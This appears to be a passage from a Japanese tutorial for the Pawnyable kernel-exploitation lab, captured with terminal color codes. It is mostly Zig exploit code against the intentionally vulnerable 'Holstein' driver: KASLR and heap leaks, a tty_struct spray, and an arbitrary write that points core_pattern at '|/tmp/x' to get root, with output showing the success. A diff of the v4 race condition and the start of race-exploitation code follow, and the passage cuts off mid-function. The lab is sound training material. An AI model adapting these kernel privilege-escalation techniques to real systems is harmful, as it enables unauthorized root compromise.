�[33mfn�[0m�[1m�[37m �[0m�[37mleakHeap�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37moffset�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mcomptime�[0m�[1m�[37m �[0m�[1m�[37mblk�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mld_semaphore�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@FieldType�[0m�[1m�[37m(�[0m�[1m�[37mtty_struct�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"ldisc_sem"�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mbreak�[0m�[1m�[37m �[0m�[1m�[36m:�[0m�[1m�[37mblk�[0m�[1m�[37m �[0m�[37m@offsetOf�[0m�[1m�[37m(�[0m�[1m�[37mtty_struct�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"ldisc_sem"�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m+�[0m�[1m�[37m �[0m�[37m@offsetOf�[0m�[1m�[37m(�[0m�[1m�[37mld_semaphore�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"read_wait"�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m+�[0m�[1m�[37m �[0m�[37m@sizeOf�[0m�[1m�[37m(�[0m�[37m@typeInfo�[0m�[1m�[37m(�[0m�[37m@FieldType�[0m�[1m�[37m(�[0m�[1m�[37mld_semaphore�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"read_wait"�[0m�[1m�[37m)).�[0m�[1m�[37m@�[0m�[33m"struct"�[0m�[1m�[37m.�[0m�[1m�[37mfields�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m].�[0m�[1m�[36mtype�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[37moffset�[0m�[1m�[37m]�[0m�[1m�[36mu8�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mread�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mbuf�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mret�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37mbytesAsValue�[0m�[1m�[37m(�[0m�[1m�[36mu64�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[37m[�[0m�[1m�[37mbuf�[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[36m-�[0m�[1m�[36m8�[0m�[1m�[37m..]).�[0m�[1m�[36m*�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[37mret�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mbuf�[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[36m-�[0m�[1m�[36m8�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37maaw�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mttys�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[]�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mg_buf_addr�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mvalue�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu32�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37maddress�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mwrite�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37masBytes�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mtty_struct�[0m�[1m�[37m{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mdriver�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mg_buf_addr�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mops�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mg_buf_addr�[0m�[1m�[37m �[0m�[1m�[36m+�[0m�[1m�[37m �[0m�[37m@sizeOf�[0m�[1m�[37m(�[0m�[1m�[37mtty_struct�[0m�[1m�[37m),�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mldisc_sem�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mread_wait�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mnext�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mg_buf_addr�[0m...
�[1m�[37m �[0m�[33mfor�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mttys�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37mtty�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[33mif�[0m�[1m�[37m �[0m�[1m�[37m(.�[0m�[1m�[37mSUCCESS�[0m�[1m�[37m �[0m�[1m�[36m==�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37merrno�[0m�[1m�[37m(�[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[37mioctl�[0m�[1m�[37m(�[0m�[1m�[37mtty�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mvalue�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37maddress�[0m�[1m�[37m)))�[0m�[1m�[37m �[0m�[33mbreak�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37madjust_offsets�[0m�[1m�[37m(�[0m�[1m�[37mkaslr_offset�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mgadgets�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37m[�[0m�[1m�[37m_�[0m�[1m�[37m]�[0m�[1m�[36m*�[0m�[1m�[36mu64�[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mMOV_ADDROF_RDX_RCX�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mCORE_PATTERN�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mfor�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mgadgets�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37mg�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mg�[0m�[1m�[37m.�[0m�[1m�[36m*�[0m�[1m�[37m �[0m�[1m�[36m+=�[0m�[1m�[37m �[0m�[1m�[37mkaslr_offset�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mpub�[0m�[1m�[37m �[0m�[33mfn�[0m�[1m�[37m �[0m�[37mmain�[0m�[1m�[37m()�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[37mcatchSigsegv�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mcorePattern�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[37msaveState�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mfd�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mopen�[0m�[1m�[37m(�[0m�[33m"/dev/holstein"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mACCMODE�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mRDWR�[0m�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m �[0m�[1m�[36m0o660�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mdefer�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mclose�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mfd2�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mopen�[0m�[1m�[37m(�[0m�[33m"/dev/holstein"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mACCMODE�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mRDWR�[0m�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m �[0m�[1m�[36m0o660�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mclose�[0m�[1m�[37m(�[0m�[1m�[37mfd2�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mttys�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m100�[0m�[1m�[37m]�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mdefer�[0m�[1m�[37m �[0m�[33mfor�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mttys�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37mtty�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mclose�[0m�[1m�[37m(�[0m�[1m�[37mtty�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37mspray�[0m�[1m�[37m(�[0m�[1m�[37mttys�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m..]);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mkaslr_offset�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37mleakKASLROffset�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37minfo�[0m�[1m�[37m(�[0m�[33m"Kernel base: 0x{s}"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mfmt�[0m�[1m�[37m.�[0m�[37mbytesToHex�[0m�[1m�[37m(�[0m�[37mbigEndianify�[0m�[1m�[37m(�[0m�[1m�[36m8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37masBytes�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37m(�[0m�[1m�[37mkaslr_offset�[0m�[1m�[36m+�[0m�[1m�[36m0xffffffff81000000�[0m�[1m�[37m))),�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mlower�[0m�[1m�[37m)});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[37madjust_offsets�[0m�[1m�[37m(�[0m�[1m�[37mkaslr_offset�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mg_buf_addr�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37mleakHeap�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37maaw�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mttys�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mg_buf_addr�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37mreadInt�[0m�[1m�[37m(�[0m�[1m�[36mu32�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"|/tm"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mlittle�[0m�[1m�[37m),�[0m�[1m�[37m �[0m�[1m�[37mCORE_PATTERN�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37maaw�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mttys�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mg_buf_addr�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37mreadInt�[0m�[1m�[37m(�[0m�[1m�[36mu32�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"p/x�[0m�[33m\x00�[0m�[33m"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mlittle�[0m�[1m�[37m),�[0m�[1m�[37m �[0m�[1m�[37mCORE_PATTERN�[0m�[1m�[36m+�[0m�[1m�[36m0x4�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[37mcorePattern�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37mwhoami: unknown uid 1337�[0m
�[1m�[37m[INFO] Kernel base: 0xffffffffb0c00000�[0m
�[1m�[37m[INFO] You won!!�[0m
�[1m�[37mroot�[0m
(DIR) 完全なエクスプロイト
=== �[1m�[4mv4: Race Condition�[22m�[24m
�[1m�[37m10c10�[0m
�[1m�[37m< MODULE_DESCRIPTION("Holstein v3 - Vulnerable Kernel Driver for Pawnyable");�[0m
�[1m�[37m---�[0m
�[1m�[37m> MODULE_DESCRIPTION("Holstein v4 - Vulnerable Kernel Driver for Pawnyable");�[0m
�[1m�[37m14a15�[0m
�[1m�[37m> int mutex = 0;�[0m
�[1m�[37m20a22,27�[0m
�[1m�[37m> if (mutex) {�[0m
�[1m�[37m> printk(KERN_INFO "resource is busy");�[0m
�[1m�[37m> return -EBUSY;�[0m
�[1m�[37m> }�[0m
�[1m�[37m> mutex = 1;�[0m
�[1m�[37m>�[0m
�[1m�[37m71a79�[0m
�[1m�[37m> mutex = 0;�[0m
TOCTOUが導入してしまった⸺�[40m�[35m`mutex`�[39m�[49mの確認と更新はアトミックじゃない。
UAFを成功するためには、二つのスレッドが�[40m`if
(mutex)`�[49m�[24mを通り過し、そして一つを閉じることが必要だ。
�[1m�[36m<<�[0m�[1m�[37mpin�[0m�[1m�[36m-�[0m�[1m�[37mto�[0m�[1m�[36m-�[0m�[1m�[37mcore�[0m�[1m�[36m>>�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mmaster_fd�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36m?�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mnull�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37mrace_master�[0m�[1m�[37m(�[0m�[1m�[37mslave_sync�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36m*�[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mThread�[0m�[1m�[37m.�[0m�[1m�[37mResetEvent�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mmaster_sync�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36m*�[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mThread�[0m�[1m�[37m.�[0m�[1m�[37mResetEvent�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mwhile�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[36mtrue�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mThread�[0m�[1m�[37m.�[0m�[37msleep�[0m�[1m�[37m(�[0m�[1m�[36m2�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mif�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mopen�[0m�[1m�[37m(�[0m�[33m"/dev/holstein"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mACCMODE�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mRDWR�[0m�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m �[0m�[1m�[36m0o660�[0m�[1m�[37m))�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37mmfd�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mslave_sync�[0m�[1m�[37m.�[0m�[37mwait�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mslave_sync�[0m�[1m�[37m.�[0m�[37mreset�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mif�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mslave_fd�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37m_�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mmaster_fd�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mmfd�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mmaster_sync�[0m�[1m�[37m.�[0m�[37mset�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mbreak�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mclose�[0m�[1m�[37m(�[0m�[1m�[37mmfd�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37merr�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[33mswitch�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37merr�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33merror�[0m�[1m�[37m.�[0m�[1m�[37mDeviceBusy�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mslave_sync�[0m�[1m�[37m.�[0m�[37mwait�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mslave_sync�[0m�[1m�[37m.�[0m�[37mreset�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[33munreachable�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mmaster_sync�[0m�[1m�[37m.�[0m�[37mset�[0m�[1m�[37m();�[0m�[1m�[37m �[0m�[33m// resume execution of slave�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mslave_fd�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36m?�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mnull�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37mrace_slave�[0m�[1m�[37m(�[0m�[1m�[37mslave_sync�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36m*�[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mThread�[0m�[1m�[37m.�[0m�[1m�[37mResetEvent�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mmaster_sync�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36m*�[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mThread�[0m�[1m�[37m.�[0m�[1m�[37mResetEvent�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mwhile�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[36mtrue�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mThread�[0m�[1m�[37m.�[0m�[37msleep�[0m�[1m�[37m(�[0m�[1m�[36m2�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mif�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mopen�[0m�[1m�[37m(�[0m�[33m"/dev/holstein"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mACCMODE�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mRDWR�[0m�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m �[0m�[1m�[36m0o660�[0m�[1m�[37m))�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37msfd�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mslave_fd�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37msfd�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mslave_sync�[0m�[1m�[37m.�[0m�[37mset�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mmaster_sync�[0m�[1m�[37m.�[0m�[37mwait�[0m�[1m�[37m();�[0m�[1m�[37m �[0m�[33m// sleep and let master resume execution�[0m
�[1m�[37m �[0m�[1m�[37mmaster_sync�[0m�[1m�[37m.�[0m�[37mreset�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mclose�[0m�[1m�[37m(�[0m�[1m�[37msfd�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mslave_fd�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mnull�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mif�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mmaster_fd�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37m_�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[33mbreak�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37merr�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[33mswitch�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37merr�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
